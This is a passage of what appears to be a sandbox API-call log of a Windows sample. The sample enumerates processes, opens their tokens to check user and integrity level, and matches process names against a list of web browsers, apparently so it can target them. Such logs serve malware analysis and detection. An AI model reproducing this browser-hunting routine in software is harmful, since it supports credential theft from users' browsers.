ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.479] CloseHandle (hObject=0xb8) returned 1 [0245.479] CloseHandle (hObject=0xb4) returned 1 [0245.479] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.479] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.479] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.479] GetLastError () returned 0x7a [0245.479] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.480] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.480] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.480] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0245.480] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0245.480] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0245.480] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0245.480] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0245.480] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0245.480] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0245.480] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.481] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.481] GetLastError () returned 0x7a [0245.481] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.481] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.481] CloseHandle (hObject=0xb8) returned 1 [0245.481] CloseHandle (hObject=0xb4) returned 1 [0245.481] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.482] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.482] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.482] GetLastError () returned 0x7a [0245.482] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.482] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.482] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.482] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0245.482] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0245.482] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0245.483] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0245.483] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0245.483] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0245.483] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0245.483] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.483] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.483] GetLastError () returned 0x7a [0245.483] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.483] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.484] CloseHandle (hObject=0xb8) returned 1 [0245.484] CloseHandle (hObject=0xb4) returned 1 [0245.484] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.484] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.484] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.484] GetLastError () returned 0x7a [0245.484] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.485] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.485] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.485] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0245.485] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0245.485] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0245.485] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0245.485] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0245.485] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0245.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0245.485] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0245.486] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0245.486] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.486] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.486] GetLastError () returned 0x7a [0245.486] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.486] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.486] CloseHandle (hObject=0xb8) returned 1 [0245.486] CloseHandle (hObject=0xb4) returned 1 [0245.487] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.487] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.487] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.487] GetLastError () returned 0x7a [0245.487] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.487] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.487] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.487] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0245.488] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0245.488] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0245.488] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0245.488] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0245.488] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0245.488] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xb4 [0245.488] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.488] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.488] GetLastError () returned 0x7a [0245.489] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.489] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.489] CloseHandle (hObject=0xb8) returned 1 [0245.489] CloseHandle (hObject=0xb4) returned 1 [0245.489] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.489] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.489] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.489] GetLastError () returned 0x7a [0245.490] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.490] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.490] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.490] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0245.490] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0245.490] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0245.490] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0245.490] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0245.490] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0245.491] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xb4 [0245.491] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.491] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.491] GetLastError () returned 0x7a [0245.491] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.491] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.491] CloseHandle (hObject=0xb8) returned 1 [0245.491] CloseHandle (hObject=0xb4) returned 1 [0245.492] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.492] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.492] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.492] GetLastError () returned 0x7a [0245.492] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.492] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.492] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.492] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0245.493] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0245.493] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0245.493] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0245.493] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0245.493] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0245.493] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xb4 [0245.493] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.493] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.493] GetLastError () returned 0x7a [0245.493] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.494] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.494] CloseHandle (hObject=0xb8) returned 1 [0245.494] CloseHandle (hObject=0xb4) returned 1 [0245.494] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.494] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.494] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.494] GetLastError () returned 0x7a [0245.495] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.495] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.495] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.495] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0245.495] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0245.495] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0245.495] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0245.495] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0245.495] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0245.495] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xb4 [0245.496] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.496] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.496] GetLastError () returned 0x7a [0245.496] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.496] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.496] CloseHandle (hObject=0xb8) returned 1 [0245.496] CloseHandle (hObject=0xb4) returned 1 [0245.496] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.497] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.497] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.497] GetLastError () returned 0x7a [0245.497] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.497] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.497] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.497] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0245.497] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0245.498] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0245.498] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0245.498] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0245.498] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0245.498] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xb4 [0245.498] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.498] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.498] GetLastError () returned 0x7a [0245.498] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0245.498] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0245.499] CloseHandle (hObject=0xb8) returned 1 [0245.499] CloseHandle (hObject=0xb4) returned 1 [0245.499] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0245.499] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0245.499] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0245.499] GetLastError () returned 0x7a [0245.499] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0245.500] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0245.500] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0245.500] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0245.500] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0245.500] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0245.500] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0245.500] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0245.500] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0245.500] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0245.500] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0245.501] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0245.501] GetLastError () returned 0x7a [0245.501] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: 